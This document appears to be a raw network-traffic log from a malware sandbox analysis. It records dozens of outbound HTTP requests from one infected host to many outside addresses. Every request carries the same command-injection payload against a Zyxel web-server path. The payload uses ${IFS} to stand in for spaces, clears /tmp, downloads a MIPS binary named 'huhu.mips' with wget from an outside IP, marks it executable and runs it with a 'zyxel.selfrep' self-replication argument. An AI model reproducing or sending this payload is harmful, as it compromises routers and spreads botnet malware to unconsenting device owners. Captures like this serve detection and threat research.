                                                Jan 29, 2024 07:07:41.172885895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2588192.168.2.2353742154.89.108.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172935009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2589192.168.2.234836423.75.42.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.172951937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2590192.168.2.2354538160.130.117.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173002005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2591192.168.2.234307877.128.140.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173031092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2592192.168.2.235113264.181.54.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173069954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2593192.168.2.233566098.65.6.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173119068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2594192.168.2.2349182149.137.213.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173151016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2595192.168.2.2347802172.134.104.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173192978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2596192.168.2.2342776217.79.49.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173237085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2597192.168.2.234561644.183.91.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173263073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2598192.168.2.2337206101.91.117.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173301935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2599192.168.2.235397013.187.37.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173331976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2600192.168.2.2348422149.132.208.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173383951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2601192.168.2.2345894203.43.153.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173401117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2602192.168.2.2338444168.89.86.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173439980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2603192.168.2.2343172135.13.92.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173489094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2604192.168.2.2334928137.225.48.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173540115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2605192.168.2.2360928166.249.247.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173568964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2606192.168.2.2340282150.167.23.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173609018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2607192.168.2.234762872.159.239.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173635006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2608192.168.2.234756284.52.157.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173666954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2609192.168.2.234386232.208.81.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173693895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2610192.168.2.2344234116.203.209.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173726082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2611192.168.2.2351606114.2.241.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173763990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2612192.168.2.235447843.174.205.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173804045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2613192.168.2.2360942144.185.27.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173850060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2614192.168.2.2348736102.202.100.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173871040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2615192.168.2.235132254.56.203.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173907042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2616192.168.2.234322477.39.82.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173928976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2617192.168.2.2334674111.176.184.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.173964977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2618192.168.2.2353994136.184.250.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174006939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2619192.168.2.2350212134.178.187.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174035072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2620192.168.2.233295058.28.233.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174072027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2621192.168.2.2350360180.189.3.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174104929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2622192.168.2.234876612.230.172.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174141884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2623192.168.2.2360096118.171.70.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174176931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2624192.168.2.233540059.232.200.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174225092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2625192.168.2.234888636.91.169.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174279928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2626192.168.2.235267685.71.89.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174313068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2627192.168.2.2350608112.162.56.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174352884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2628192.168.2.235158634.162.119.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174384117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2629192.168.2.2356760196.92.163.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174433947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2630192.168.2.233311693.5.119.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174457073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2631192.168.2.2355570160.250.227.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174493074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2632192.168.2.233784071.231.77.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174530983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2633192.168.2.235057494.87.20.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174576044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2634192.168.2.2348166182.198.15.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174599886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2635192.168.2.2342504102.45.195.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174639940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2636192.168.2.233517875.165.44.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174669027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2637192.168.2.235400277.162.27.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174727917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2638192.168.2.2340716124.212.206.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174767017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2639192.168.2.2357108219.30.75.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174803019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2640192.168.2.2342568183.31.42.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174851894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2641192.168.2.233316091.3.216.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174879074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2642192.168.2.235064818.143.69.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174920082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2643192.168.2.234975651.157.80.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174940109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2644192.168.2.235170670.7.42.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.174983025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2645192.168.2.2332808120.15.79.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175014019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2646192.168.2.2335016155.188.61.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175040960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2647192.168.2.2344490166.118.119.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175106049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2648192.168.2.2343110138.178.127.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175131083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2649192.168.2.234156825.79.85.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175196886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2650192.168.2.2344628159.135.212.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:41.175215006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2651192.168.2.2333504138.39.186.184443
                                                TimestampBytes transferredDirectionData
